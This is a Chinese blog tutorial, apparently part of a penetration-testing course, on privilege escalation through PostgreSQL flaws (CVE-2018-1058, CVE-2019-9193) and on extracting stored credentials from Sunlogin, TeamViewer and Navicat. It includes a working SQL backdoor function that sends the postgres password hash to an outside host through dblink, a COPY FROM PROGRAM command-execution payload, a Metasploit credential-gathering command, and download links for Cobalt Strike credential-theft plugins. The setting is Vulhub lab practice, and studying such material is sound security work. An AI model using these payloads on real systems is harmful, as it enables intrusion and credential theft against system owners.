第100天:权限提升-数据库&Redis&Postgre&第三方软件&TV&向日葵&服务类

最新推荐文章于 2024-08-16 18:39:05 发布
最新推荐文章于 2024-08-16 18:39:05 发布
阅读量749 收藏 20
点赞数 22
文章标签: 数据库 redis 缓存 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71529930/article/details/139405922
版权

目录

思维导图

案例一:  数据库-Redis 数据库权限提升-计划任务

案例二:  数据库-PostgreSQL 数据库权限提升-漏洞

PostgreSQL 提权漏洞(CVE-2018-1058)

PostgreSQL 高权限命令执行漏洞(CVE-2019-9193) 

案例三:  三方应用-Teamviewer&向日葵&Navivat-凭据

向日葵

teamviewer

获取navicat或者一些浏览器密码

思维导图

案例一:  数据库-Redis 数据库权限提升-计划任务

redis攻防之前写过一篇文章这里不赘述
第55天:服务攻防-数据库安全&Redis&Hadoop&Mysql&未授权访问&RCE-CSDN博客

案例二:  数据库-PostgreSQL 数据库权限提升-漏洞

PostgreSQL 提权漏洞(CVE-2018-1058)

靶场地址:Vulhub - Docker-Compose file for vulnerability environment

首先部署docker

利用命令进行连接数据库

psql --host your-ip --username vulhub

输入下面的命令,进行生成后门

CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$
    select dblink_connect((select 'hostaddr=10.0.0.1 port=5433 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres'))); 
    SELECT pg_catalog.array_to_string($1,$2);
$$ LANGUAGE SQL VOLATILE;

开启监听

利用超级用户执行docker命令

docker-compose exec postgres pg_dump -U postgres -f evil.bak vulhub

成功反弹shell

后面是管理员的MD5加密密码

PostgreSQL 高权限命令执行漏洞(CVE-2019-9193) 

靶场位置:https://vulhub.org/#/environments/postgres/CVE-2019-9193/

首先拉取靶场后利用工具连接

 利用下面的poc可以进行任意命令执行

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

 如果可以执行命令,就可以权限提升

案例三:  三方应用-Teamviewer&向日葵&Navivat-凭据

向日葵

利用webshell查看进程,命令tasklist看是否有 SunloginClient.exe

利用工具cs的欧拉插件,欧拉插件的下载地址

链接:https://pan.baidu.com/s/1VlXzscen07K1tcUAxyEKyw?pwd=id41
提取码:id41

利用cs时先生成后门,反弹shell这里不再赘述,不会的去翻看前面的文章

先上传,再运行,为了确保有执行权限放在网站目录下

 

运行以后这里由于版本问题,旧版的向日葵已经无法正常运行了,而新版的做了完整的限制

这里只能看到验证码,看不到识别码,主要学习思路,万一遇到了符合的版本就ok

利用工具进行解密

工具的地址:GitHub - wafinfo/Sunflower_get_Password: 一款针对向日葵的识别码和验证码提取工具

视频中的执行效果

teamviewer

cs的欧拉插件里面也有自动提取密码的模块,iis用户貌似是无法执行的,其他得有个普通用户的权限

也可以利用这个msf进行破解,首先先生成后门建立连接,这里就不过多赘述

注意一定是在这个会话下,执行下面的命令

run post/windows/gather/credentials/teamviewer_passwords

获取navicat或者一些浏览器密码

需要用到插件LSTAR

链接:https://pan.baidu.com/s/1YGSHtdL3-IWAZUopqTkU6Q?pwd=cj10
提取码:cj10

利用工具

获取一下wifi密码

xiaojiesec
关注
  • 22
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
第61权限提升-Redis&Postgre&令牌窃取&进程注入1
08-03
本文以“第61权限提升-Redis&Postgre&令牌窃取&进程注入1”为主题,探讨了四种不同的提权策略,分别是通过数据库应用提权、Redis数据库权限提升PostgreSQL数据库权限提升以及Windows系统的令牌窃取和进程注入...
SpringBootDemo:Spring Boot&Kafka&Redis&Hbase&Mybits
05-01
SpringBootDemo 2018.06.08 -完成整合Hbase 2.0.0 API,kafka 0.8 API,redis 2.9.0 API单机和集群,增加redis集群key超时失效监听 2018.07.16 -完成企业级maven依赖,以后扩展,将采用子模块形式
redies&postgres数据库提权&第三方软件服务提权
m0_62207170的博客
03-19 412
redies&postgres数据库提权&第三方软件服务提权
第55服务攻防-数据库安全&Redis&Hadoop&Mysql&未授权访问&RCE
weixin_71529930的博客
04-08 1157
也会输入这个文件当中造成影响,可以新开一个kali窗口,进行纯净版的输入,如图。因为root用户只能本地登录,可以采取利用phpmyadmin去远程登录利用,爆破密码。1.redis.conf中 bind表示允许谁访问,被注释了表示都可以访问。首先centos中的计时任务,可以写在/var/spool/cron中。利用该攻击方式,还需要允许密钥对登录,并且redis以root登录。访问你的ip地址/cluster/apps,如果存在证明有漏洞。如果没有端口,利用组合猜测,例如:php-mysql。
第97权限提升-Web权限&权限划分&源码后台&中间件&第三方&数据库
qq_46081990的博客
06-22 749
【代码】第97权限提升-Web权限&权限划分&源码后台&中间件&第三方&数据库等。
redis-3.0.0&redis;-3.0.0.gem.zip
01-17
Redis是一款高性能的键值对存储系统,常被用于数据库缓存和消息中间件等场景。这个压缩包“redis-3.0.0&redis-3.0.0.gem.zip”包含了Redis服务器的源码包(redis-3.0.0.tar.gz)以及一个与Ruby相关的库(redis-...
05-Redis 核心数据结构 & Redis 6 新特性详解-郭嘉.zip
06-06
3. 模块系统(Modules System):允许第三方开发者编写模块,扩展Redis的功能,如图数据库、全文搜索等。 4. Stream数据结构:似于日志的结构,提供了一种更强大、更灵活的数据持久化方式,适用于事件驱动和消息...
webjs 数据库 离线读取本地数据库源码-SAAS 本地化及未来之窗行业应用跨平台架构
cybersnow精通 28 门计算机语言,凭借其超凡的技术能力,成功开发过上万个应用,广泛涉及政府、商业、个人等众多领域,甚至在检察院、环保局、公安局等专业场景中也大放异彩。不仅熟练掌握单片机和物联网开发,在软件架构设计方面更是独树一帜,自创了跨平台软件
08-15 176
【代码】webjs 数据库 离线读取本地数据库源码-SAAS 本地化及未来之窗行业应用跨平台架构。
[Qt][Qt窗口][下]详细讲解
SnowK博客
08-13 3679
[Qt][Qt窗口][下]详细讲解
mysql介绍
weixin_57763462的博客
08-14 301
丰富的存储引擎:MySQL 提供了多种存储引擎,如 InnoDB、MyISAM、Memory 等,每种存储引擎都有其特定的应用场景和优势。多语言支持:MySQL 支持多种编程语言,包括 C、C++、Python、Java、Perl、PHP 等,并提供了相应的 API。安全性:MySQL 提供了灵活的权限和密码系统,支持基于主机的验证,并且所有的密码传输都采用加密形式,确保了数据的安全性。管理工具:MySQL 提供了丰富的管理工具,如命令行客户端、图形界面管理工具等,方便用户进行数据库的管理和维护。
旅游网站
最新发布
weixin_43213064的博客
08-16 577
【代码】springboot旅游网站
[PHP]-Laravel中Group By引发的问题思考
hmx224_2014的专栏
08-16 239
Laravel 和 ThinkPHP 是两个不同的 PHP 框架,它们在底层使用了相同的 SQL 查询语言来与数据库交互。然而,由于框架的设计和实现方式不同,它们在生成 SQL 查询时可能会表现出一些细微的差异,包括对GROUP BY 子句的处理。在调用查询公司在线报告接口时,发现我请求的数据室20条每页,但是经查询存在16,17条的都有,并且后几页也不稳定,就一直查询问题。
SQL Server 时间算差值/常用函数
学习和分享
08-13 259
DATEDIFF()是计算时间差值的直接工具,而DATEADD()CONVERT()CAST()DATEPART()和EOMONTH()等函数则提供了额外的灵活性和控制能力,以满足更复杂的时间处理需求。
Mybatis XML 数据源为 Oracle 之批量插入或更新 Merge Into 的具体介绍与使用
欢迎来到 ABin-阿斌的博客:写一生代码,创一世佳话,筑一览芳华。
08-12 700
由于近期在所开发的项目中,对于数据入库,有存在即更新,不存在则插入的需求,因此发现了 Oracle中的 MergeInto 命令。本文将对MergeInto的用法进行介绍并将 MergeInto 和批量插入进行结合,同时还会对在 MergeInto 开发中遇到的问题进行总结。MergeInto 命令是 Oracle9i 中新增的命令,有了 MergeInto 语句,我们对数据能够不仅仅只做单一的插入或单一的更新,而是可以将更新与插入一起操作。
基于JAVA生产制造执行系统设计与实现(源码+论文+讲解等)
程序员阿龙的博客
08-13 974
当下,如果 还依然使用纸质文档来记录并且管理相关信息,可能会出现很多问题,比如原始文件的丢失,因为采用纸质文档,很容易受潮或者怕火,不容易备份,需要花费大量的人员和资金来管理用纸质文档存储的信息,最重要的是数据出现问题寻找起来很麻烦,并且修改也困难,如果还这样操作会造成很大的资源浪费和经济损失。所以,对于本课题研究的产品生产制造信息的管理就需要有一款软件来代替手工操作,因此MES生产制造执行系统就应运而生。MES生产制造执行系统运用的工具包括Eclipse,Tomcat以及Navicat等。
企业架构MySQL读写分离
A1357924680_的博客
08-16 469
DAU : 2000 (每日活跃⽤户数) 之前业务中是单台 MySQL 提供服务,使用多台MySQL数据库务器,降低单台压力,实现集群架构的稳定性和高可用性 数据的一致性 完整性 replication通过业务比对和分析发现,随着活跃用户数增多,读取数据的请求变多,故着重解决读取数据的压力。基于主从复制的基础上,常见的数据库负载均衡使用的是读写分离方式。在业务代码中,数据库的操作,不直接连接数据库,而是先请求到中间件服务器(代理)由代理服务器,判断是读操作去从数据服务器,写操作去主数据服务器。
Could not connect to Redis at 127.0.0.1:6379: Connection refused not connected>
12-29
根据提供的引用内容,当出现"Could not connect to Redis at 127.0.0.1:6379: Connection refused"的错误时,可能是由于以下原因导致无法连接到Redis数据库: 1. 用户权限问题:在连接Redis时,可能忘记切换为root用户。请确保使用root用户重新连接Redis。 2. Redis服务器未运行:检查Redis服务器是否已成功运行。可以使用以下命令检查Redis服务器的运行状态: ```shell systemctl status redis ``` 如果Redis服务器未运行,请使用以下命令启动Redis服务器: ```shell systemctl start redis ``` 3. 网络连接问题:检查网络连接是否正常。确保Redis服务器的IP地址和端口号正确,并且网络连接没有任何问题。 如果以上步骤都没有解决问题,请提供更多详细的错误信息以便进一步排查问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值